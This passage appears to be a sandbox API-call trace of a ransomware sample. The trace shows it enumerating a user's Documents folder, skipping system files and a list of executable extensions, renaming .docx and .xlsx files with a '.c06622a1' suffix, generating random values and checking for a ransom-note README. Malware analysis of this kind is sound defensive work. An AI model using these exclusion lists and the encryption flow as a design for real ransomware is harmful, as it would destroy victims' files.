_wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0149.673] wcslen (_String="adv") returned 0x3 [0149.673] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0149.673] wcslen (_String="ani") returned 0x3 [0149.673] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0149.673] wcslen (_String="bat") returned 0x3 [0149.673] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0149.673] wcslen (_String="bin") returned 0x3 [0149.673] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0149.673] wcslen (_String="cab") returned 0x3 [0149.673] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0149.673] wcslen (_String="cmd") returned 0x3 [0149.673] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0149.673] wcslen (_String="com") returned 0x3 [0149.673] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0149.673] wcslen (_String="cpl") returned 0x3 [0149.673] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0149.673] wcslen (_String="cur") returned 0x3 [0149.673] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0149.673] wcslen (_String="deskthemepack") returned 0xd [0149.673] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0149.673] wcslen (_String="diagcab") returned 0x7 [0149.674] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0149.674] wcslen (_String="diagcfg") returned 0x7 [0149.674] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0149.674] wcslen (_String="diagpkg") returned 0x7 [0149.674] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0149.674] wcslen (_String="dll") returned 0x3 [0149.674] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0149.674] wcslen (_String="drv") returned 0x3 [0149.674] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0149.674] wcslen (_String="exe") returned 0x3 [0149.674] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0149.674] wcslen (_String="hlp") returned 0x3 [0149.674] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0149.674] wcslen (_String="icl") returned 0x3 [0149.674] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0149.674] wcslen (_String="icns") returned 0x4 [0149.674] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0149.674] wcslen (_String="ico") returned 0x3 [0149.674] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0149.674] wcslen (_String="ics") returned 0x3 [0149.674] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0149.674] wcslen (_String="idx") returned 0x3 [0149.674] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0149.674] wcslen (_String="ldf") returned 0x3 [0149.674] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0149.674] wcslen (_String="lnk") returned 0x3 [0149.675] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0149.675] wcslen (_String="mod") returned 0x3 [0149.675] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0149.675] wcslen (_String="mpa") returned 0x3 [0149.675] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0149.675] wcslen (_String="msc") returned 0x3 [0149.675] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0149.675] wcslen (_String="msp") returned 0x3 [0149.675] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0149.675] wcslen (_String="msstyles") returned 0x8 [0149.675] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0149.675] wcslen (_String="msu") returned 0x3 [0149.675] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0149.675] wcslen (_String="nls") returned 0x3 [0149.675] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0149.675] wcslen (_String="nomedia") returned 0x7 [0149.675] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0149.675] wcslen (_String="ocx") returned 0x3 [0149.675] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0149.675] wcslen (_String="prf") returned 0x3 [0149.675] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0149.675] wcslen (_String="ps1") returned 0x3 [0149.675] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0149.675] wcslen (_String="rom") returned 0x3 [0149.675] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0149.675] wcslen (_String="rtp") returned 0x3 [0149.676] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0149.676] wcslen (_String="scr") returned 0x3 [0149.676] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0149.676] wcslen (_String="shs") returned 0x3 [0149.676] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0149.676] wcslen (_String="spl") returned 0x3 [0149.676] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0149.676] wcslen (_String="sys") returned 0x3 [0149.676] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0149.676] wcslen (_String="theme") returned 0x5 [0149.676] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0149.676] wcslen (_String="themepack") returned 0x9 [0149.676] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0149.676] wcslen (_String="wpx") returned 0x3 [0149.676] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0149.676] wcslen (_String="lock") returned 0x4 [0149.676] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0149.676] wcslen (_String="key") returned 0x3 [0149.676] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0149.676] wcslen (_String="hta") returned 0x3 [0149.676] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0149.676] wcslen (_String="msi") returned 0x3 [0149.676] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0149.676] wcslen (_String="pdb") returned 0x3 [0149.677] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0149.677] wcslen (_String="sql") returned 0x3 [0149.677] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0149.677] wcslen (_String="sqlite") returned 0x6 [0149.677] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.677] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.677] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.677] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.677] wcscpy (in: _Dest=0x44d00d0, _Source="PuwBlfUakQWQJF00DEBu.docx" | out: _Dest="PuwBlfUakQWQJF00DEBu.docx") returned="PuwBlfUakQWQJF00DEBu.docx" [0149.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx", dwFileAttributes=0x80) returned 1 [0149.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\puwblfuakqwqjf00debu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0149.677] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.677] ReadFile (in: hFile=0x66c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.678] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xba386340 [0149.678] RtlComputeCrc32 (PartialCrc=0x6340, Buffer=0x3feb74, Length=0x80) returned 0x21b98ac7 [0149.678] RtlComputeCrc32 (PartialCrc=0x8ac7, Buffer=0x3feb74, Length=0x80) returned 0x95cce099 [0149.678] RtlComputeCrc32 (PartialCrc=0xe099, Buffer=0x3feb74, Length=0x80) returned 0x7074cc88 [0149.678] RtlComputeCrc32 (PartialCrc=0xcc88, Buffer=0x3feb74, Length=0x80) returned 0xbf3211c9 [0149.678] CloseHandle (hObject=0x66c) returned 1 [0149.678] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.678] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx" [0149.679] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx") returned 0x45 [0149.679] wcscpy (in: _Dest=0x44e010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.679] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\puwblfuakqwqjf00debu.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\puwblfuakqwqjf00debu.docx.c06622a1"), dwFlags=0x8) returned 1 [0149.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PuwBlfUakQWQJF00DEBu.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\puwblfuakqwqjf00debu.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0149.682] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.682] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x52d0020 [0149.688] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4970fc79 [0149.688] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6cf06de8 [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72250b7f [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6763a7f6 [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f76a13e [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb6f8bc3 [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x382c602f [0149.689] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14d70bd1 [0149.692] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x52d0094, Length=0x80) returned 0xc8bdf7d0 [0149.692] RtlComputeCrc32 (PartialCrc=0xf7d0, Buffer=0x52d0094, Length=0x80) returned 0x61db3dee [0149.692] RtlComputeCrc32 (PartialCrc=0x3dee, Buffer=0x52d0094, Length=0x80) returned 0x3a550cd0 [0149.692] RtlComputeCrc32 (PartialCrc=0xcd0, Buffer=0x52d0094, Length=0x80) returned 0x12f7f6ff [0149.692] RtlComputeCrc32 (PartialCrc=0xf6ff, Buffer=0x52d0094, Length=0x80) returned 0x48bd6ab8 [0149.692] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x52d0020) returned 1 [0149.692] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.692] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.692] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f979220, ftCreationTime.dwHighDateTime=0x1d5c174, ftLastAccessTime.dwLowDateTime=0x9681f530, ftLastAccessTime.dwHighDateTime=0x1d5bf17, ftLastWriteTime.dwLowDateTime=0x9681f530, ftLastWriteTime.dwHighDateTime=0x1d5bf17, nFileSizeHigh=0x0, nFileSizeLow=0xddbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="r3rzKvocn_.xlsx", cAlternateFileName="R3RZKV~1.XLS")) returned 1 [0149.692] _wcsicmp (_Str1="r3rzKvocn_.xlsx", _Str2="README.c06622a1.TXT") returned -50 [0149.692] wcsstr (_Str="r3rzKvocn_.xlsx", _SubStr="README") returned 0x0 [0149.692] _wcsicmp (_Str1="autorun.inf", _Str2="r3rzKvocn_.xlsx") returned -17 [0149.692] wcslen (_String="autorun.inf") returned 0xb [0149.692] _wcsicmp (_Str1="boot.ini", _Str2="r3rzKvocn_.xlsx") returned -16 [0149.692] wcslen (_String="boot.ini") returned 0x8 [0149.693] _wcsicmp (_Str1="bootfont.bin", _Str2="r3rzKvocn_.xlsx") returned -16 [0149.693] wcslen (_String="bootfont.bin") returned 0xc [0149.693] _wcsicmp (_Str1="bootsect.bak", _Str2="r3rzKvocn_.xlsx") returned -16 [0149.693] wcslen (_String="bootsect.bak") returned 0xc [0149.693] _wcsicmp (_Str1="desktop.ini", _Str2="r3rzKvocn_.xlsx") returned -14 [0149.693] wcslen (_String="desktop.ini") returned 0xb [0149.693] _wcsicmp (_Str1="iconcache.db", _Str2="r3rzKvocn_.xlsx") returned -9 [0149.693] wcslen (_String="iconcache.db") returned 0xc [0149.693] _wcsicmp (_Str1="ntldr", _Str2="r3rzKvocn_.xlsx") returned -4 [0149.693] wcslen (_String="ntldr") returned 0x5 [0149.693] _wcsicmp (_Str1="ntuser.dat", _Str2="r3rzKvocn_.xlsx") returned -4 [0149.693] wcslen (_String="ntuser.dat") returned 0xa [0149.693] _wcsicmp (_Str1="ntuser.dat.log", _Str2="r3rzKvocn_.xlsx") returned -4 [0149.693] wcslen (_String="ntuser.dat.log") returned 0xe [0149.693] _wcsicmp (_Str1="ntuser.ini", _Str2="r3rzKvocn_.xlsx") returned -4 [0149.693] wcslen (_String="ntuser.ini") returned 0xa [0149.693] _wcsicmp (_Str1="thumbs.db", _Str2="r3rzKvocn_.xlsx") returned 2 [0149.693] wcslen (_String="thumbs.db") returned 0x9 [0149.693] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0149.693] wcslen (_String="386") returned 0x3 [0149.693] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0149.693] wcslen (_String="adv") returned 0x3 [0149.693] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0149.693] wcslen (_String="ani") returned 0x3 [0149.694] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0149.694] wcslen (_String="bat") returned 0x3 [0149.694] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0149.694] wcslen (_String="bin") returned 0x3 [0149.694] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0149.694] wcslen (_String="cab") returned 0x3 [0149.694] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0149.694] wcslen (_String="cmd") returned 0x3 [0149.694] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0149.694] wcslen (_String="com") returned 0x3 [0149.694] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0149.694] wcslen (_String="cpl") returned 0x3 [0149.694] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0149.694] wcslen (_String="cur") returned 0x3 [0149.694] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="deskthemepack") returned 0xd [0149.694] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="diagcab") returned 0x7 [0149.694] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="diagcfg") returned 0x7 [0149.694] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="diagpkg") returned 0x7 [0149.694] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="dll") returned 0x3 [0149.694] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0149.694] wcslen (_String="drv") returned 0x3 [0149.695] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0149.695] wcslen (_String="exe") returned 0x3 [0149.695] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0149.695] wcslen (_String="hlp") returned 0x3 [0149.695] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0149.695] wcslen (_String="icl") returned 0x3 [0149.695] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0149.695] wcslen (_String="icns") returned 0x4 [0149.695] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0149.695] wcslen (_String="ico") returned 0x3 [0149.695] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0149.695] wcslen (_String="ics") returned 0x3 [0149.695] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0149.695] wcslen (_String="idx") returned 0x3 [0149.695] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0149.695] wcslen (_String="ldf") returned 0x3 [0149.695] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0149.695] wcslen (_String="lnk") returned 0x3 [0149.695] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0149.695] wcslen (_String="mod") returned 0x3 [0149.695] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0149.695] wcslen (_String="mpa") returned 0x3 [0149.695] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0149.695] wcslen (_String="msc") returned 0x3 [0149.695] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0149.696] wcslen (_String="msp") returned 0x3 [0149.696] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0149.696] wcslen (_String="msstyles") returned 0x8 [0149.696] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0149.696] wcslen (_String="msu") returned 0x3 [0149.696] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0149.696] wcslen (_String="nls") returned 0x3 [0149.696] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0149.696] wcslen (_String="nomedia") returned 0x7 [0149.696] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0149.696] wcslen (_String="ocx") returned 0x3 [0149.696] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0149.696] wcslen (_String="prf") returned 0x3 [0149.696] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0149.696] wcslen (_String="ps1") returned 0x3 [0149.696] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0149.696] wcslen (_String="rom") returned 0x3 [0149.696] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0149.696] wcslen (_String="rtp") returned 0x3 [0149.696] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0149.696] wcslen (_String="scr") returned 0x3 [0149.696] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0149.696] wcslen (_String="shs") returned 0x3 [0149.696] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0149.697] wcslen (_String="spl") returned 0x3 [0149.697] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0149.697] wcslen (_String="sys") returned 0x3 [0149.697] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0149.697] wcslen (_String="theme") returned 0x5 [0149.697] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0149.697] wcslen (_String="themepack") returned 0x9 [0149.697] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0149.697] wcslen (_String="wpx") returned 0x3 [0149.697] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0149.697] wcslen (_String="lock") returned 0x4 [0149.697] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0149.697] wcslen (_String="key") returned 0x3 [0149.697] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0149.697] wcslen (_String="hta") returned 0x3 [0149.697] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0149.697] wcslen (_String="msi") returned 0x3 [0149.697] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0149.697] wcslen (_String="pdb") returned 0x3 [0149.697] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0149.697] wcslen (_String="sql") returned 0x3 [0149.697] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0149.697] wcslen (_String="sqlite") returned 0x6 [0149.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.698] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.698] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.698] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.698] wcscpy (in: _Dest=0x44d00d0, _Source="r3rzKvocn_.xlsx" | out: _Dest="r3rzKvocn_.xlsx") returned="r3rzKvocn_.xlsx" [0149.698] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx", dwFileAttributes=0x80) returned 1 [0149.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r3rzkvocn_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0149.698] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.698] ReadFile (in: hFile=0x648, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.699] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x944b7b2b [0149.699] RtlComputeCrc32 (PartialCrc=0x7b2b, Buffer=0x3feb74, Length=0x80) returned 0xf5811dc3 [0149.699] RtlComputeCrc32 (PartialCrc=0x1dc3, Buffer=0x3feb74, Length=0x80) returned 0x8008e76d [0149.699] RtlComputeCrc32 (PartialCrc=0xe76d, Buffer=0x3feb74, Length=0x80) returned 0x7400eb47 [0149.699] RtlComputeCrc32 (PartialCrc=0xeb47, Buffer=0x3feb74, Length=0x80) returned 0xd357a523 [0149.699] CloseHandle (hObject=0x648) returned 1 [0149.699] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.699] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx" [0149.699] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx") returned 0x3b [0149.699] wcscpy (in: _Dest=0x44e00f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.700] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r3rzkvocn_.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r3rzkvocn_.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0149.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r3rzKvocn_.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r3rzkvocn_.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0149.703] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.703] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5360020 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b2e1b31 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x333eb0ca [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ab7d768 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14765426 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1577f589 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27b7bcf9 [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x697528ca [0149.710] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5826dfe9 [0149.713] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5360094, Length=0x80) returned 0xf5734e1f [0149.713] RtlComputeCrc32 (PartialCrc=0x4e1f, Buffer=0x5360094, Length=0x80) returned 0xc1770021 [0149.713] RtlComputeCrc32 (PartialCrc=0x21, Buffer=0x5360094, Length=0x80) returned 0x485deb2f [0149.713] RtlComputeCrc32 (PartialCrc=0xeb2f, Buffer=0x5360094, Length=0x80) returned 0x1f10efc8 [0149.713] RtlComputeCrc32 (PartialCrc=0xefc8, Buffer=0x5360094, Length=0x80) returned 0x9d417593 [0149.713] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5360020) returned 1 [0149.714] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.714] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.714] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7403960, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7403960, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7403960, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.714] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.714] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4187120, ftCreationTime.dwHighDateTime=0x1d58d92, ftLastAccessTime.dwLowDateTime=0x8ca33b0, ftLastAccessTime.dwHighDateTime=0x1d563b4, ftLastWriteTime.dwLowDateTime=0x8ca33b0, ftLastWriteTime.dwHighDateTime=0x1d563b4, nFileSizeHigh=0x0, nFileSizeLow=0x41ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="rvL-U9LVkxG.pptx", 